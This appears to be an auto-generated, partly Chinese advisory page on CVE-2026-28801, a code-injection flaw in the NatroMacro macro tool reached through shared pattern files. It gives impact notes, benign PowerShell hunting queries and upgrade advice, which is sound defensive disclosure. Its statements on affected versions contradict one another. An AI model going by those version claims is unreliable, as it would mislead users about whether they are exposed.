1.1.1
CVE-2026-28801 affects NatroMacro, an open-source macro tool for Bee Swarm Simulator. This vulnerability allows an attacker to inject and execute malicious code through shared pattern or path files, potentially leading to unauthorized actions within the application. Versions of NatroMacro prior to 1.1.0 are vulnerable, and a patch is available in version 1.1.0.
The primary impact of CVE-2026-28801 is the ability for an attacker to execute arbitrary code on a victim's system. Because NatroMacro users frequently share pattern and path files, a malicious actor can craft a file containing harmful AutoHotkey code and distribute it to unsuspecting users. Upon opening or using the compromised file within NatroMacro, the embedded code will execute silently in the background. This could lead to data theft, system manipulation, or even remote control of the affected machine. The blast radius extends to anyone using vulnerable versions of NatroMacro and sharing files with others.
This vulnerability was publicly disclosed on 2026-03-06. There are currently no known public exploits or active campaigns targeting CVE-2026-28801. It is not listed on the CISA KEV catalog. The ease of exploitation stems from the common practice of sharing files among NatroMacro users, making it a potentially attractive target for opportunistic attackers.
Bee Swarm Simulator players who actively share NatroMacro pattern and path files are at the highest risk. Users who download files from untrusted sources or participate in online communities where file sharing is common are particularly vulnerable. Legacy NatroMacro installations that have not been updated are also at risk.
• windows / supply-chain:
Get-Process -Name NatroMacro | Select-Object -ExpandProperty Path• windows / supply-chain:
Get-ScheduledTask | Where-Object {$_.TaskName -like '*NatroMacro*'}• windows / supply-chain:
Get-ItemProperty 'HKCU:\Software\NatroMacro' -Name 'LastRun'disclosure
漏洞利用状态
EPSS
0.02% (5% 百分位)
CISA SSVC
CVSS 向量
The definitive mitigation for CVE-2026-28801 is to upgrade NatroMacro to version 1.1.0 or later. If upgrading is not immediately feasible, exercise extreme caution when opening or using pattern or path files from untrusted sources. Consider implementing a review process for shared files to scan for potentially malicious AutoHotkey code. While a direct WAF rule is not applicable, monitoring for unusual process activity associated with NatroMacro can provide an early warning. After upgrading, confirm the fix by attempting to execute a known malicious pattern file – it should no longer trigger code execution.
将 NatroMacro 更新到 1.1.0 或更高版本。此版本通过阻止第三方共享的 pattern 或 path 文件中包含的恶意 AutoHotkey 代码执行来修复代码注入漏洞。
漏洞分析和关键警报直接发送到您的邮箱。
CVE-2026-28801 is a medium-severity vulnerability in NatroMacro versions up to 1.1.0 that allows malicious code to be executed from shared pattern/path files, potentially leading to unauthorized actions.
You are affected if you are using NatroMacro version 1.1.0 or earlier and share pattern or path files with other users.
Upgrade NatroMacro to version 1.1.0 or later to resolve this vulnerability. Exercise caution when opening files from untrusted sources until the upgrade is complete.
As of now, there are no known public exploits or active campaigns targeting CVE-2026-28801, but caution is advised.
Refer to the NatroMacro project's official repository or website for the latest advisory and release notes regarding CVE-2026-28801.
上传你的依赖文件,立即了解此CVE和其他CVE是否影响你。